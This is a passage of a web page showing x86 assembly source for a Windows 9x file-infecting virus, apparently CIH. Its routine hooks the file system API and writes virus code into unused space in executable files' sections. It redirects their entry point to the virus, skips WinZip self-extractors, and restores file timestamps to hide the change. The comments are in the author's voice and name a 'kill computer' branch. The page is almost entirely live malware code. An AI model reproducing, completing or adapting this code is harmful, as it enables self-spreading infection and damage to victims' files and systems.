📄 3.htm
字号:
; * EBP = D600h ==> Read Data in File * <br>
; ************************************* <br>
; * Stack Dump : * <br>
; * * <br>
; * ESP => ------------------------- * <br>
; * | EFLAG(CF=0) | * <br>
; * ------------------------- * <br>
; * | FileNameBufferPointer | * <br>
; * ------------------------- * <br>
; * | EDI | * <br>
; * ------------------------- * <br>
; * | ESI | * <br>
; * ------------------------- * <br>
; * | EBP | * <br>
; * ------------------------- * <br>
; * | ESP | * <br>
; * ------------------------- * <br>
; * | EBX | * <br>
; * ------------------------- * <br>
; * | EDX | * <br>
; * ------------------------- * <br>
; * | ECX | * <br>
; * ------------------------- * <br>
; * | EAX | * <br>
; * ------------------------- * <br>
; * | Return Address | * <br>
; * ------------------------- * <br>
; ************************************* </p>
<p>push ebx ; Save File Handle </p>
<p>push 00h ; Set VirusCodeSectionTableEndMark </p>
<p>; *************************** <br>
; * Let's Set the * <br>
; * Virus' Infected Mark * <br>
; *************************** </p>
<p>push 01h ; Size <br>
push edx ; Pointer of File <br>
push edi ; Address of Buffer </p>
<p>; *************************** <br>
; * Save ESP Register * <br>
; *************************** </p>
<p>mov dr1, esp </p>
<p>; *************************** <br>
; * Let's Set the * <br>
; * NewAddressOfEntryPoint * <br>
; * ( Only First Set Size ) * <br>
; *************************** </p>
<p>push eax ; Size </p>
<p>; *************************** <br>
; * Let's Read * <br>
; * Image Header in File * <br>
; *************************** </p>
<p>mov eax, ebp <br>
mov cl, SizeOfImageHeaderToRead <br>
add edx, 07h ; Move EDX to NumberOfSections <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; *************************** <br>
; * Let's Set the * <br>
; * NewAddressOfEntryPoint * <br>
; * ( Set Pointer of File, * <br>
; * Address of Buffer ) * <br>
; *************************** </p>
<p>lea eax, (AddressOfEntryPoint-@8)[edx] <br>
push eax ; Pointer of File </p>
<p>lea eax, (NewAddressOfEntryPoint-@8)[esi] <br>
push eax ; Address of Buffer </p>
<p>; *************************** <br>
; * Move EDX to the Start * <br>
; * of SectionTable in File * <br>
; *************************** </p>
<p>movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] <br>
lea edx, [eax+edx+12h] </p>
<p>; *************************** <br>
; * Let's Get * <br>
; * Total Size of Sections * <br>
; *************************** </p>
<p>mov al, SizeOfScetionTable </p>
<p>; I Assume NumberOfSections <= 0ffh <br>
mov cl, (NumberOfSections-@8)[esi] </p>
<p>mul cl </p>
<p>; *************************** <br>
; * Let's Set Section Table * <br>
; *************************** </p>
<p>; Move ESI to the Start of SectionTable <br>
lea esi, (StartOfSectionTable-@8)[esi] </p>
<p>push eax ; Size <br>
push edx ; Pointer of File <br>
push esi ; Address of Buffer </p>
<p>; *************************** <br>
; * The Code Size of Merge * <br>
; * Virus Code Section and * <br>
; * Total Size of Virus * <br>
; * Code Section Table Must * <br>
; * be Small or Equal the * <br>
; * Unused Space Size of * <br>
; * Following Section Table * <br>
; *************************** </p>
<p>inc ecx <br>
push ecx ; Save NumberOfSections+1 </p>
<p>shl ecx, 03h <br>
push ecx ; Save TotalSizeOfVirusCodeSectionTable </p>
<p>add ecx, eax <br>
add ecx, edx </p>
<p>sub ecx, (SizeOfHeaders-@9)[esi] <br>
not ecx <br>
inc ecx </p>
<p>cmp cx, small CodeSizeOfMergeVirusCodeSection <br>
jl short OnlySetInfectedMark </p>
<p>; *************************** <br>
; * Save Original * <br>
; * Address of Entry Point * <br>
; *************************** </p>
<p>; Save My Virus First Section Code <br>
; Size of Following Section Table... <br>
; ( Not Include the Size of Virus Code Section Table ) <br>
push ecx </p>
<p>xchg ecx, eax ; ECX = Size of Section Table </p>
<p>mov eax, (AddressOfEntryPoint-@9)[esi] <br>
add eax, (ImageBase-@9)[esi] <br>
mov (OriginalAddressOfEntryPoint-@9)[esi], eax </p>
<p>; *************************** <br>
; * Read All Section Tables * <br>
; *************************** </p>
<p>mov eax, ebp <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; *************************** <br>
; * Let's Set Total Virus * <br>
; * Code Section Table * <br>
; *************************** </p>
<p>; EBX = My Virus First Section Code <br>
; Size of Following Section Table <br>
pop ebx <br>
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable <br>
pop ecx ; ECX = NumberOfSections+1 </p>
<p>push edi ; Size </p>
<p>add edx, eax <br>
push edx ; Pointer of File </p>
<p>add eax, esi </p>
<p>; Modify the Bug that WinZip Self-Extractor Occurs Error... <br>
; So When Open WinZip Self-Extractor, My Virus Don't Infect it... <br>
; The WinZip Self-Extractor Last Section Name is '_winzip_' <br>
; I Just Only Test Last Four Bytes ==> 'zip_' <br>
cmp dword ptr [eax-SizeOfScetionTable+04h], '_piz' <br>
je OnlySetInfectedMark </p>
<p>push eax ; Address of Buffer </p>
<p>; *************************** <br>
; * Set the First Virus * <br>
; * Code Section Size in * <br>
; * VirusCodeSectionTable * <br>
; *************************** </p>
<p>lea eax, [eax+edi-04h] <br>
mov [eax], ebx </p>
<p>; *************************** <br>
; * Let's Set My Virus * <br>
; * First Section Code * <br>
; *************************** </p>
<p>push ebx ; Size </p>
<p>add edx, edi <br>
push edx ; Pointer of File </p>
<p>lea edi, (MyVirusStart-@9)[esi] <br>
push edi ; Address of Buffer </p>
<p>; *************************** <br>
; * Let's Modify the * <br>
; * AddressOfEntryPoint to * <br>
; * My Virus Entry Point * <br>
; *************************** </p>
<p>mov (NewAddressOfEntryPoint-@9)[esi], edx </p>
<p>; *************************** <br>
; * Setup Initial Data * <br>
; *************************** </p>
<p>lea edx, [esi-SizeOfScetionTable] <br>
mov ebp, offset VirusSize </p>
<p>jmp StartToWriteCodeToSections </p>
<p>; *************************** <br>
; * Write Code to Sections * <br>
; *************************** </p>
<p>LoopOfWriteCodeToSections: </p>
<p>add edx, SizeOfScetionTable </p>
<p>mov ebx, (SizeOfRawData-@9)[edx] <br>
sub ebx, (VirtualSize-@9)[edx] <br>
jbe EndOfWriteCodeToSections </p>
<p>push ebx ; Size </p>
<p>sub eax, 08h <br>
mov [eax], ebx </p>
<p>mov ebx, (PointerToRawData-@9)[edx] <br>
add ebx, (VirtualSize-@9)[edx] <br>
push ebx ; Pointer of File </p>
<p>push edi ; Address of Buffer </p>
<p>mov ebx, (VirtualSize-@9)[edx] <br>
add ebx, (VirtualAddress-@9)[edx] <br>
add ebx, (ImageBase-@9)[esi] <br>
mov [eax+4], ebx </p>
<p>mov ebx, [eax] <br>
add (VirtualSize-@9)[edx], ebx </p>
<p>; Section contains initialized data ==> 00000040h <br>
; Section can be Read. ==> 40000000h <br>
or (Characteristics-@9)[edx], 40000040h </p>
<p>StartToWriteCodeToSections: </p>
<p>sub ebp, ebx <br>
jbe SetVirusCodeSectionTableEndMark </p>
<p>add edi, ebx ; Move Address of Buffer </p>
<p>EndOfWriteCodeToSections: </p>
<p>loop LoopOfWriteCodeToSections </p>
<p>; *************************** <br>
; * Only Set Infected Mark * <br>
; *************************** </p>
<p>OnlySetInfectedMark: <br>
mov esp, dr1 </p>
<p>jmp WriteVirusCodeToFile </p>
<p>; *************************** <br>
; * Set Virus Code * <br>
; * Section Table End Mark * <br>
; *************************** </p>
<p>SetVirusCodeSectionTableEndMark: </p>
<p>; Adjust Size of Virus Section Code to Correct Value <br>
add [eax], ebp <br>
add [esp+08h], ebp </p>
<p>; Set End Mark <br>
xor ebx, ebx <br>
mov [eax-04h], ebx </p>
<p>; *************************** <br>
; * When VirusGame Calls * <br>
; * VxDCall, VMM Modifies * <br>
; * the 'int 20h' and the * <br>
; * 'Service Identifier' * <br>
; * to 'Call [XXXXXXXX]'. * <br>
; *************************** <br>
; * Before Writing My Virus * <br>
; * to File, I Must Restore * <br>
; * them First. ^__^ * <br>
; *************************** </p>
<p>lea eax, (LastVxDCallAddress-2-@9)[esi] </p>
<p>mov cl, VxDCallTableSize </p>
<p>LoopOfRestoreVxDCallID: <br>
mov word ptr [eax], 20cdh </p>
<p>mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] <br>
mov [eax+2], edx </p>
<p>movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] <br>
sub eax, edx </p>
<p>loop LoopOfRestoreVxDCallID </p>
<p>; *************************** <br>
; * Let's Write * <br>
; * Virus Code to the File * <br>
; *************************** </p>
<p>WriteVirusCodeToFile: <br>
mov eax, dr1 <br>
mov ebx, [eax+10h] <br>
mov edi, [eax] </p>
<p>LoopOfWriteVirusCodeToFile: </p>
<p>pop ecx <br>
jecxz SetFileModificationMark </p>
<p>mov esi, ecx <br>
mov eax, 0d601h <br>
pop edx <br>
pop ecx </p>
<p>call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>jmp LoopOfWriteVirusCodeToFile </p>
<p>; *************************** <br>
; * Let's Set CF = 1 ==> * <br>
; * Need to Restore File * <br>
; * Modification Time * <br>
; *************************** </p>
<p>SetFileModificationMark: <br>
pop ebx <br>
pop eax </p>
<p>stc ; Enable CF(Carry Flag) <br>
pushf </p>
<p>; ************************************* <br>
; * Close File * <br>
; ************************************* </p>
<p>CloseFile: <br>
xor eax, eax <br>
mov ah, 0d7h <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; ************************************* <br>
; * Need to Restore File Modification * <br>
; * Time !? * <br>
; ************************************* </p>
<p>popf <br>
pop esi <br>
jnc IsKillComputer </p>
<p>; ************************************* <br>
; * Restore File Modification Time * <br>
; ************************************* </p>
<p>mov ebx, edi </p>
<p>mov ax, 4303h <br>
mov ecx, (FileModificationTime-@7)[esi] <br>
mov edi, (FileModificationTime+2-@7)[esi] <br>
call ebx ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; ************************************* <br>
; * Disable OnBusy * <br>
; ************************************* </p>
<p>DisableOnBusy: <br>
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy </p>
<p>; ************************************* <br>
; * Call Previous FileSystemApiHook * <br>
; ************************************* </p>
<p>prevhook: <br>
popad </p>
<p>mov eax, dr0 ; <br>
jmp [eax] ; Jump to prevhook </p>
<p>; ************************************* <br>
; * Call the Function that the IFS * <br>
; * Manager Would Normally Call to * <br>
; * Implement this Particular I/O * <br>
; * Request. * <br>
; ************************************* </p>
<p>pIFSFunc: <br>
mov ebx, esp <br>
push dword ptr [ebx+20h+04h+14h] ; Push pioreq <br>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -